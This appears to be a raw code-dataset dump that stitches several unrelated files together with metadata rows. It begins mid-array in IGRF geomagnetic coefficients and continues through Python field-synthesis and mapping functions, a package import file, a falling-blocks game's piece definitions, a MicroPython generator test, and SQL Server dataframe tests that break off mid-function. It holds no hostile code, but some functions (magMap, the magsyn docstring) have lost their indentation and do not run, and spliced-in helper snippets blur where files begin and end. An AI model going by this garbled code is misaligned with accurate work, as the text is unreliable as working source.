0.28000000000000003, 0.080000000000000002, -0.87, -0.48999999999999999, -0.34000000000000002, -0.080000000000000002, 0.88, -0.16, -0.88, -0.76000000000000001, 0.29999999999999999, 0.33000000000000002, 0.28000000000000003, 1.72, -0.42999999999999999, -0.54000000000000004, 1.1799999999999999, -1.0700000000000001, -0.37, -0.040000000000000001, 0.75, 0.63, -0.26000000000000001, 0.20999999999999999, 0.34999999999999998, 0.53000000000000003, -0.050000000000000003, 0.38, 0.40999999999999998, -0.22, -0.10000000000000001, -0.56999999999999995, -0.17999999999999999, -0.81999999999999995], [-29496.57, -1586.4200000000001, 4944.2600000000002, -2396.0599999999999, 3026.3400000000001, -2708.54, 1668.1700000000001, -575.73000000000002, 1339.8499999999999, -2326.54, -160.40000000000001, 1232.0999999999999, 
251.75, 633.73000000000002, -537.02999999999997, 912.65999999999997, 808.97000000000003, 286.48000000000002, 166.58000000000001, -211.03, -356.82999999999998, 164.46000000000001, 89.400000000000006, -309.72000000000003, -230.87, 357.29000000000002, 44.579999999999998, 200.25999999999999, 189.00999999999999, -141.05000000000001, -118.06, -163.16999999999999, -0.01, -8.0299999999999994, 101.04000000000001, 72.780000000000001, 68.689999999999998, -20.899999999999999, 75.920000000000002, 44.18, -141.40000000000001, 61.539999999999999, -22.829999999999998, -66.260000000000005, 13.1, 3.02, -78.090000000000003, 55.399999999999999, 80.439999999999998, -75.0, -57.799999999999997, -4.5499999999999998, -21.199999999999999, 45.240000000000002, 6.54, 14.0, 24.960000000000001, 10.460000000000001, 7.0300000000000002, 1.6399999999999999, -27.609999999999999, 4.9199999999999999, -3.2799999999999998, 24.41, 8.2100000000000009, 10.84, -14.5, -20.030000000000001, -5.5899999999999999, 11.83, -19.34, -17.41, 11.609999999999999, 16.710000000000001, 10.85, 6.96, -14.050000000000001, -10.74, -3.54, 1.6399999999999999, 5.5, 9.4499999999999993, -20.539999999999999, 3.4500000000000002, 11.51, -5.2699999999999996, 12.75, 3.1299999999999999, -7.1399999999999997, -12.380000000000001, -7.4199999999999999, -0.76000000000000001, 7.9699999999999998, 8.4299999999999997, 2.1400000000000001, -8.4199999999999999, -6.0800000000000001, -10.08, 7.0099999999999998, -1.9399999999999999, -6.2400000000000002, 2.73, 0.89000000000000001, -0.10000000000000001, -1.0700000000000001, 4.71, -0.16, 4.4400000000000004, 2.4500000000000002, -7.2199999999999998, -0.33000000000000002, -0.95999999999999996, 2.1299999999999999, -3.9500000000000002, 3.0899999999999999, -1.99, -1.03, -1.97, -2.7999999999999998, -8.3100000000000005, 3.0499999999999998, -1.48, 0.13, -2.0299999999999998, 1.6699999999999999, 1.6499999999999999, -0.66000000000000003, -0.51000000000000001, -1.76, 0.54000000000000004, 0.84999999999999998, 
-0.79000000000000004, -0.39000000000000001, 0.37, -2.5099999999999998, 1.79, -1.27, 0.12, -2.1099999999999999, 0.75, -1.9399999999999999, 3.75, -1.8600000000000001, -2.1200000000000001, -0.20999999999999999, -0.87, 0.29999999999999999, 0.27000000000000002, 1.04, 2.1299999999999999, -0.63, -2.4900000000000002, 0.94999999999999996, 0.48999999999999999, -0.11, 0.58999999999999997, 0.52000000000000002, 0.0, -0.39000000000000001, 0.13, -0.37, 0.27000000000000002, 0.20999999999999999, -0.85999999999999999, -0.77000000000000002, -0.23000000000000001, 0.040000000000000001, 0.87, -0.089999999999999997, -0.89000000000000001, -0.87, 0.31, 0.29999999999999999, 0.41999999999999998, 1.6599999999999999, -0.45000000000000001, -0.58999999999999997, 1.0800000000000001, -1.1399999999999999, -0.31, -0.070000000000000007, 0.78000000000000003, 0.54000000000000004, -0.17999999999999999, 0.10000000000000001, 0.38, 0.48999999999999999, 0.02, 0.44, 0.41999999999999998, -0.25, -0.26000000000000001, -0.53000000000000003, -0.26000000000000001, -0.79000000000000004], [-29442.0, -1501.0, 4797.1000000000004, -2445.0999999999999, 3012.9000000000001, -2845.5999999999999, 1676.7, -641.89999999999998, 1350.7, -2352.3000000000002, -115.3, 1225.5999999999999, 244.90000000000001, 582.0, -538.39999999999998, 907.60000000000002, 813.70000000000005, 283.30000000000001, 120.40000000000001, -188.69999999999999, -334.89999999999998, 180.90000000000001, 70.400000000000006, -329.5, -232.59999999999999, 360.10000000000002, 47.299999999999997, 192.40000000000001, 197.0, -140.90000000000001, -119.3, -157.5, 16.0, 4.0999999999999996, 100.2, 70.0, 67.700000000000003, -20.800000000000001, 72.700000000000003, 33.200000000000003, -129.90000000000001, 58.899999999999999, -28.899999999999999, -66.700000000000003, 13.199999999999999, 7.2999999999999998, -70.900000000000006, 62.600000000000001, 81.599999999999994, -76.099999999999994, -54.100000000000001, -6.7999999999999998, -19.5, 51.799999999999997, 5.7000000000000002, 
15.0, 24.399999999999999, 9.4000000000000004, 3.3999999999999999, -2.7999999999999998, -27.399999999999999, 6.7999999999999998, -2.2000000000000002, 24.199999999999999, 8.8000000000000007, 10.1, -16.899999999999999, -18.300000000000001, -3.2000000000000002, 13.300000000000001, -20.600000000000001, -14.6, 13.4, 16.199999999999999, 11.699999999999999, 5.7000000000000002, -15.9, -9.0999999999999996, -2.0, 2.1000000000000001, 5.4000000000000004, 8.8000000000000007, -21.600000000000001, 3.1000000000000001, 10.800000000000001, -3.2999999999999998, 11.800000000000001, 0.69999999999999996, -6.7999999999999998, -13.300000000000001, -6.9000000000000004, -0.10000000000000001, 7.7999999999999998, 8.6999999999999993, 1.0, -9.0999999999999996, -4.0, -10.5, 8.4000000000000004, -1.8999999999999999, -6.2999999999999998, 3.2000000000000002, 0.10000000000000001, -0.40000000000000002, 0.5, 4.5999999999999996, -0.5, 4.4000000000000004, 1.8, -7.9000000000000004, -0.69999999999999996, -0.59999999999999998, 2.1000000000000001, -4.2000000000000002, 2.3999999999999999, -2.7999999999999998, -1.8, -1.2, -3.6000000000000001, -8.6999999999999993, 3.1000000000000001, -1.5, -0.10000000000000001, -2.2999999999999998, 2.0, 2.0, -0.69999999999999996, -0.80000000000000004, -1.1000000000000001, 0.59999999999999998, 0.80000000000000004, -0.69999999999999996, -0.20000000000000001, 0.20000000000000001, -2.2000000000000002, 1.7, -1.3999999999999999, -0.20000000000000001, -2.5, 0.40000000000000002, -2.0, 3.5, -2.3999999999999999, -1.8999999999999999, -0.20000000000000001, -1.1000000000000001, 0.40000000000000002, 0.40000000000000002, 1.2, 1.8999999999999999, -0.80000000000000004, -2.2000000000000002, 0.90000000000000002, 0.29999999999999999, 0.10000000000000001, 0.69999999999999996, 0.5, -0.10000000000000001, -0.29999999999999999, 0.29999999999999999, -0.40000000000000002, 0.20000000000000001, 0.20000000000000001, -0.90000000000000002, -0.90000000000000002, -0.10000000000000001, 0.0, 0.69999999999999996, 
0.0, -0.90000000000000002, -0.90000000000000002, 0.40000000000000002, 0.40000000000000002, 0.5, 1.6000000000000001, -0.5, -0.5, 1.0, -1.2, -0.20000000000000001, -0.10000000000000001, 0.80000000000000004, 0.40000000000000002, -0.10000000000000001, -0.10000000000000001, 0.29999999999999999, 0.40000000000000002, 0.10000000000000001, 0.5, 0.5, -0.29999999999999999, -0.40000000000000002, -0.40000000000000002, -0.29999999999999999, -0.80000000000000004], [10.300000000000001, 18.100000000000001, -26.600000000000001, -8.6999999999999993, -3.2999999999999998, -27.399999999999999, 2.1000000000000001, -14.1, 3.3999999999999999, -5.5, 8.1999999999999993, -0.69999999999999996, -0.40000000000000002, -10.1, 1.8, -0.69999999999999996, 0.20000000000000001, -1.3, -9.0999999999999996, 5.2999999999999998, 4.0999999999999996, 2.8999999999999999, -4.2999999999999998, -5.2000000000000002, -0.20000000000000001, 0.5, 0.59999999999999998, -1.3, 1.7, -0.10000000000000001, -1.2, 1.3999999999999999, 3.3999999999999999, 3.8999999999999999, 0.0, -0.29999999999999999, -0.10000000000000001, 0.0, -0.69999999999999996, -2.1000000000000001, 2.1000000000000001, -0.69999999999999996, -1.2, 0.20000000000000001, 0.29999999999999999, 0.90000000000000002, 1.6000000000000001, 1.0, 0.29999999999999999, -0.20000000000000001, 0.80000000000000004, -0.5, 0.40000000000000002, 1.3, -0.20000000000000001, 0.10000000000000001, -0.29999999999999999, -0.59999999999999998, -0.59999999999999998, -0.80000000000000004, 0.10000000000000001, 0.20000000000000001, -0.20000000000000001, 0.20000000000000001, 0.0, -0.29999999999999999, -0.59999999999999998, 0.29999999999999999, 0.5, 0.10000000000000001, -0.20000000000000001, 0.5, 0.40000000000000002, -0.20000000000000001, 0.10000000000000001, -0.29999999999999999, -0.40000000000000002, 0.29999999999999999, 0.29999999999999999, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
return models,coeffs
def magsyn(gh,sv,b,date,itype,alt,colat,elong):
"""
# Computes x, y, z, and f for a given date and position, from the
# spherical harmonic coefficients of the International Geomagnetic
# Reference Field (IGRF).
# From Malin and Barraclough (1981), Computers and Geosciences, V.7, 401-405.
#
# Input:
# date = Required date in years and decimals of a year (A.D.)
# itype = 1, if geodetic coordinates are used, 2 if geocentric
# alt = height above mean sea level in km (if itype = 1)
# alt = radial distance from the center of the earth (itype = 2)
# colat = colatitude in degrees (0 to 180)
# elong = east longitude in degrees (0 to 360)
# gh = main field values for date (calc. in igrf subroutine)
# sv = secular variation coefficients (calc. in igrf subroutine)
# begin = date of dgrf (or igrf) field prior to required date
#
# Output:
# x - north component of the magnetic force in nT
# y - east component of the magnetic force in nT
# z - downward component of the magnetic force in nT
# f - total magnetic force in nT
#
# NB: the coordinate system for x,y, and z is the same as that specified
# by itype.
#
# Modified 4/9/97 to use DGRFs from 1945 to 1990 IGRF
# Modified 10/13/06 to use 1995 DGRF, 2005 IGRF and sv coefficient
# for extrapolation beyond 2005. Coefficients from Barton et al. PEPI, 97: 23-26
# (1996), via web site for NOAA, World Data Center A. Modified to use
#degree and
# order 10 as per notes in Malin and Barraclough (1981).
# coefficients for DGRF 1995 and IGRF 2005 are from http://nssdcftp.gsfc.nasa.gov/models/geomagnetic/igrf/fortran_code/
# igrf subroutine calculates
# the proper main field and secular variation coefficients (interpolated between
# dgrf values or extrapolated from 1995 sv values as appropriate).
"""
    #
    # real gh(120),sv(120),p(66),q(66),cl(10),sl(10)
    # real begin,dateq
    p = np.zeros((66), 'f')
    q = np.zeros((66), 'f')
    cl = np.zeros((10), 'f')
    sl = np.zeros((10), 'f')
    begin = b
    t = date - begin
    r = alt
    one = colat * 0.0174532925
    ct = np.cos(one)
    st = np.sin(one)
    one = elong * 0.0174532925
    cl[0] = np.cos(one)
    sl[0] = np.sin(one)
    x, y, z = 0.0, 0.0, 0.0
    cd, sd = 1.0, 0.0
    l, ll, m, n = 1, 0, 1, 0
    if itype != 2:
        #
        # if required, convert from geodetic to geocentric
        a2 = 40680925.0
        b2 = 40408585.0
        one = a2 * st * st
        two = b2 * ct * ct
        three = one + two
        rho = np.sqrt(three)
        r = np.sqrt(alt * (alt + 2.0 * rho) + (a2 * one + b2 * two) / three)
        cd = (alt + rho) / r
        sd = (a2 - b2) / rho * ct * st / r
        one = ct
        ct = ct * cd - st * sd
        st = st * cd + one * sd
    ratio = 6371.2 / r
    rr = ratio * ratio
    #
    # compute Schmidt quasi-normal coefficients p and x(=q)
    p[0] = 1.0
    p[2] = st
    q[0] = 0.0
    q[2] = ct
    for k in range(1, 66):
        if n < m:  # else go to 2
            m = 0
            n = n + 1
            rr = rr * ratio
            fn = n
            gn = n - 1
        # 2
        fm = m
        if k != 2:  # else go to 4
            if m == n:  # else go to 3
                one = np.sqrt(1.0 - 0.5 / fm)
                j = k - n - 1
                p[k] = one * st * p[j]
                q[k] = one * (st * q[j] + ct * p[j])
                cl[m - 1] = cl[m - 2] * cl[0] - sl[m - 2] * sl[0]
                sl[m - 1] = sl[m - 2] * cl[0] + cl[m - 2] * sl[0]
            else:
                # 3
                gm = m * m
                one = np.sqrt(fn * fn - gm)
                two = np.sqrt(gn * gn - gm) / one
                three = (fn + gn) / one
                i = k - n
                j = i - n + 1
                p[k] = three * ct * p[i] - two * p[j]
                q[k] = three * (ct * q[i] - st * p[i]) - two * q[j]
        #
        # synthesize x, y, and z in geocentric coordinates.
        # 4
        one = (gh[l - 1] + sv[ll + l - 1] * t) * rr
        if m != 0:  # else go to 7
            two = (gh[l] + sv[ll + l] * t) * rr
            three = one * cl[m - 1] + two * sl[m - 1]
            x = x + three * q[k]
            z = z - (fn + 1.0) * three * p[k]
            if st != 0.0:  # else go to 5
                y = y + (one * sl[m - 1] - two * cl[m - 1]) * fm * p[k] / st
            else:
                # 5
                y = y + (one * sl[m - 1] - two * cl[m - 1]) * q[k] * ct
            l = l + 2
        else:
            # 7
            x = x + one * q[k]
            z = z - (fn + 1.0) * one * p[k]
            l = l + 1
        m = m + 1
    #
    # convert to the coordinate system specified by itype
    one = x
    x = x * cd + z * sd
    z = z * cd - one * sd
    f = np.sqrt(x * x + y * y + z * z)
    #
    return x, y, z, f
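#
# Hedged illustration (not part of the original module): for a purely axial
# dipole field (only the g1^0 coefficient nonzero, itype=2, r=6371.2 km),
# the spherical harmonic synthesis in magsyn above reduces to the closed-form
# dipole expressions below. The helper name is ours, added only as a sanity
# check on the Schmidt quasi-normalized recursion, not a library function.
import math

def dipole_field_example(g10, colat_deg):
    """Return x (north), z (down), and f in nT for an axial dipole at Earth's surface."""
    theta = math.radians(colat_deg)
    x = -g10 * math.sin(theta)        # north component
    z = -2.0 * g10 * math.cos(theta)  # downward component
    f = math.sqrt(x * x + z * z)      # total field (y vanishes for an axial dipole)
    return x, z, f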
#
def cart2dir(x, y, z):
    """
    Converts a direction in cartesian coordinates into declination, inclination,
    and intensity.

    Parameters
    ----------
    x, y, z : north, east, and down components of the vector

    Returns
    -------
    Dec, Inc, B : declination and inclination in degrees, and the vector length

    Examples
    --------
    >>> cart2dir(0, 1, 0)
    (90.0, 0.0, 1.0)
    """
    B = np.sqrt(x**2 + y**2 + z**2)  # calculate resultant vector length
    Dec = np.degrees(np.arctan2(y, x)) % 360.  # declination, with arctan2 handling the quadrant, taken modulo 360
    Inc = np.degrees(np.arcsin(z / B))  # inclination, converted to degrees
    return Dec, Inc, B
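#
# Hedged helper (not in the original module): the inverse of cart2dir,
# included to document the same coordinate conventions (x north, y east,
# z down, angles in degrees). The name dir2cart_example is ours.
import math

def dir2cart_example(dec, inc, intensity=1.0):
    """Convert declination, inclination, and intensity back to x, y, z."""
    decr, incr = math.radians(dec), math.radians(inc)
    x = intensity * math.cos(decr) * math.cos(incr)  # north component
    y = intensity * math.sin(decr) * math.cos(incr)  # east component
    z = intensity * math.sin(incr)                   # down component
    return x, y, z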
#
def magMap(date,**kwargs):
"""
generates the data for a map of the magnetic field.
Inputs:
required:
date = decimal year for evaluation (between 1900 and 2020)
optional:
lon_0 = desired zero longitude
Returns:
Bdec = declinations
Binc = inclinations
B = field strength (in microtesla)
lons = array of longitudes
lats = array of latitudes
"""
if 'lon_0' in kwargs.keys(): # check if there are keyword arguments
lon_0=kwargs['lon_0'] # if lon_0 is set, use that one
else: # otherwise.....
lon_0=0. # set the default lon_0 to 0.
incr=10 # we can vary to the resolution of the model
lonmax=(lon_0+180.)%360+incr # get some parameters for our arrays of lat/lon
lonmin=(lon_0-180.)
latmax=90+incr
lons=np.arange(lonmin,lonmax,incr) # make a 1D array of longitudes (like elons)
lats=np.arange(-90,latmax,incr)# make a 1D array of longitudes (like elats)
# set up some containers for the field elements
lenLats, lenLons = len(lats), len(lons)
B=np.zeros((lenLats,lenLons))
Binc=np.zeros((lenLats,lenLons))
Bdec=np.zeros((lenLats,lenLons))
Brad=np.zeros((lenLats,lenLons))
for j in range(lenLats): # step through the latitudes
for i in range(lenLons): # and the longitudes
x,y,z,f=doigrf(lons[i],lats[j],date) # get the field elements
Dec,Inc,Int=cart2dir(x,y,z) # turn them into polar coordinates
B[j][i]=Int*1e-3 # convert the intensity from nanotesla to microtesla
Binc[j][i]=Inc # store the inclination value
Bdec[j][i]=Dec # store the declination value
return Bdec,Binc,B,lons,lats # return the arrays.
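The lat/lon grid arithmetic in magMap can be checked in isolation; a small sketch with the default lon_0 and the 10-degree increment used above:

```python
import numpy as np

lon_0, incr = 0., 10
lonmax = (lon_0 + 180.) % 360 + incr   # 190: np.arange excludes the stop value
lonmin = lon_0 - 180.
lons = np.arange(lonmin, lonmax, incr)  # -180, -170, ..., 180
lats = np.arange(-90, 90 + incr, incr)  # -90, -80, ..., 90
print(lons.size, lats.size)  # 37 longitudes, 19 latitudes
```

Adding `incr` to the stop value is what keeps the +180° meridian and the north pole in the grid; without it, arange's exclusive stop would drop the last row and column.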
| 151.455598 | 30,390 | 0.591072 | 7,253 | 39,227 | 3.194954 | 0.170964 | 0.152937 | 0.220731 | 0.288612 | 0.222241 | 0.16256 | 0.149527 | 0.11371 | 0.103914 | 0.10167 | 0 | 0.58642 | 0.192036 | 39,227 | 258 | 30,391 | 152.042636 | 0.144728 | 0.116935 | 0 | 0.055118 | 0 | 0 | 0.000815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03937 | false | 0 | 0.007874 | 0 | 0.086614 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fec59320a9c1dfb6faa73f5395984acd7ebbd238 | 139 | py | Python | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 4 | 2018-11-13T21:50:57.000Z | 2020-11-25T18:42:57.000Z | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 9 | 2020-10-25T01:58:07.000Z | 2021-06-13T19:17:50.000Z | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 3 | 2018-12-29T23:30:25.000Z | 2020-10-14T18:00:03.000Z | from .plateinfo_and_samplesheet import print_plate_info, make_sample_sheet
from .demultiplex import demultiplex_pipeline, update_snakemake
| 46.333333 | 74 | 0.899281 | 18 | 139 | 6.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071942 | 139 | 2 | 75 | 69.5 | 0.906977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
fed79c24d0e942b5885da91678830398fe9516e2 | 1,774 | py | Python | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | BASE_SPEED = 20 # Number of frames between moving the piece downward
LEVEL_SPEED_ADJUST = 1 # How much to increase speed for each level
LINES_PER_LEVEL = 10 # How many lines to clear to get to the next level
TILE_SIZE = 8
GAME_WIDTH = 10
GAME_HEIGHT = 20
GAME_TOP_TX = 11
GAME_TOP_TY = 2
GAME_TOP_X = TILE_SIZE * GAME_TOP_TX
GAME_TOP_Y = TILE_SIZE * GAME_TOP_TY
PIECES = [
# J
[[
[0, 0, 0],
[3, 3, 3],
[0, 0, 3],
], [
[0, 3, 0],
[0, 3, 0],
[3, 3, 0],
], [
[3, 0, 0],
[3, 3, 3],
[0, 0, 0],
], [
[0, 3, 3],
[0, 3, 0],
[0, 3, 0],
]],
# L
[[
[0, 0, 0],
[2, 2, 2],
[2, 0, 0],
], [
[2, 2, 0],
[0, 2, 0],
[0, 2, 0],
], [
[0, 0, 2],
[2, 2, 2],
[0, 0, 0],
], [
[0, 2, 0],
[0, 2, 0],
[0, 2, 2],
]],
# T
[[
[0, 0, 0],
[1, 1, 1],
[0, 1, 0],
], [
[0, 1, 0],
[1, 1, 0],
[0, 1, 0],
], [
[0, 1, 0],
[1, 1, 1],
[0, 0, 0],
], [
[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
]],
# O
[[
[1, 1],
[1, 1],
]],
# I
[[
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1],
[0, 0, 0, 0],
], [
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
]],
# S
[[
[0, 0, 0],
[0, 3, 3],
[3, 3, 0],
], [
[0, 3, 0],
[0, 3, 3],
[0, 0, 3],
]],
# Z
[[
[0, 0, 0],
[2, 2, 0],
[0, 2, 2],
], [
[0, 2, 0],
[2, 2, 0],
[2, 0, 0],
]]
]
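Each entry in PIECES is a list of pre-computed rotation states (one state for O, two for I/S/Z, four for J/L/T). A hypothetical helper — `rotation_of` is not in the original file — would wrap the rotation index so repeated rotations cycle through the stored states:

```python
def rotation_of(piece, r):
    # pick rotation state r, wrapping so any integer index is valid
    return piece[r % len(piece)]

O_PIECE = [[
    [1, 1],
    [1, 1],
]]  # the O piece stores a single rotation state

# rotating the O piece any number of times yields the same grid
assert rotation_of(O_PIECE, 0) == rotation_of(O_PIECE, 7)
```

Storing rotations as explicit grids, as this file does, trades a little memory for simplicity: the game never has to rotate a matrix at runtime.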
| 15.839286 | 72 | 0.26832 | 259 | 1,774 | 1.752896 | 0.19305 | 0.255507 | 0.171806 | 0.105727 | 0.385463 | 0.365639 | 0.310573 | 0.178414 | 0.077093 | 0.037445 | 0 | 0.222607 | 0.511274 | 1,774 | 111 | 73 | 15.981982 | 0.301038 | 0.087373 | 0 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a0ef49791603be5a9470de1d2f12ba93ad10702 | 61 | py | Python | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | x = (a for a in l)
f(a for a in l)
f(a + b for a, b in f())
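The three statements above exercise Python's generator-expression forms: bound to a name, passed as a sole call argument (where the extra parentheses may be dropped), and with tuple unpacking in the loop target. A runnable illustration of the same shapes:

```python
l = [1, 2, 3]

x = (a for a in l)            # generator bound to a name; evaluated lazily
assert list(x) == [1, 2, 3]

assert sum(a for a in l) == 6  # sole argument: no extra parentheses needed

pairs = [(1, 10), (2, 20)]
assert sum(a + b for a, b in pairs) == 33  # unpacking inside the expression
```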
| 12.2 | 24 | 0.47541 | 20 | 61 | 1.45 | 0.35 | 0.413793 | 0.344828 | 0.482759 | 0.655172 | 0.655172 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0.344262 | 61 | 4 | 25 | 15.25 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a47df3fe0c489f2771ebcbcf58ca6c137d94284 | 25,456 | py | Python | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | null | null | null | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | 18 | 2021-08-05T19:29:25.000Z | 2022-03-02T16:08:08.000Z | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | 1 | 2022-02-08T09:14:56.000Z | 2022-02-08T09:14:56.000Z | from datetime import datetime
import warnings
import pytest
import pandas as pd
import pyodbc
from mssql_dataframe.connect import connect
from mssql_dataframe.core import custom_warnings, conversion, create
pd.options.mode.chained_assignment = "raise"
class package:
def __init__(self, connection):
self.connection = connection.connection
self.create = create.create(self.connection)
self.create_meta = create.create(self.connection, include_metadata_timestamps=True)
@pytest.fixture(scope="module")
def sql():
db = connect(database="tempdb", server="localhost")
yield package(db)
db.connection.close()
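The sql fixture above uses pytest's yield-fixture pattern: code before the yield is setup, code after it is teardown, run once per module thanks to `scope="module"`. Stripped of pytest, the pattern is a plain generator; a sketch with a stand-in resource (the dict here is illustrative, not the real connection object):

```python
def managed_resource():
    handle = {"open": True}    # setup: acquire the resource
    yield handle               # hand it to the test body
    handle["open"] = False     # teardown: runs when the generator resumes

gen = managed_resource()
handle = next(gen)             # pytest advances to the yield before the test
assert handle["open"]
next(gen, None)                # ...and resumes it afterwards, running teardown
assert not handle["open"]
```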
@pytest.fixture(scope="module")
def sample():
dataframe = pd.DataFrame(
{
"_varchar": [None, "b", "c", "4", "e"],
"_tinyint": [None, 2, 3, 4, 5],
"_smallint": [256, 2, 6, 4, 5], # tinyint max is 255
"_int": [32768, 2, 3, 4, 5], # smallint max is 32,767
"_bigint": [2147483648, 2, 3, None, 5], # int max size is 2,147,483,647
"_float": [1.111111, 2, 3, 4, 5], # any decicmal places
"_time": [str(datetime.now().time())]
* 5, # string in format HH:MM:SS.ffffff
"_datetime": [datetime.now()] * 4 + [pd.NaT],
"_empty": [None] * 5,
}
)
return dataframe
def test_table_errors(sql):
table_name = "##test_table_column"
with pytest.raises(KeyError):
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns, primary_key_column="Z")
def test_table_column(sql):
table_name = "##test_table_column"
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 1
assert all(schema.index == "A")
assert all(schema["sql_type"] == "varchar")
assert all(schema["is_nullable"] == True)
assert all(schema["ss_is_identity"] == False)
assert all(schema["pk_seq"].isna())
assert all(schema["pk_name"].isna())
assert all(schema["pandas_type"] == "string")
assert all(schema["odbc_type"] == pyodbc.SQL_VARCHAR)
assert all(schema["odbc_size"] == 0)
assert all(schema["odbc_precision"] == 0)
def test_table_pk(sql):
table_name = "##test_table_pk"
columns = {"A": "TINYINT", "B": "VARCHAR(100)", "C": "FLOAT"}
primary_key_column = "A"
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 3
assert all(schema.index == ["A", "B", "C"])
assert all(schema["sql_type"] == ["tinyint", "varchar", "float"])
assert all(schema["is_nullable"] == [False, False, True])
assert all(schema["ss_is_identity"] == False)
assert schema["pk_seq"].equals(
pd.Series([1, pd.NA, pd.NA], index=["A", "B", "C"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, True, True])
assert all(schema["pandas_type"] == ["UInt8", "string", "float64"])
assert all(
schema["odbc_type"]
== [pyodbc.SQL_TINYINT, pyodbc.SQL_VARCHAR, pyodbc.SQL_FLOAT]
)
assert all(schema["odbc_size"] == [1, 0, 8])
assert all(schema["odbc_precision"] == [0, 0, 53])
def test_table_composite_pk(sql):
table_name = "##test_table_composite_pk"
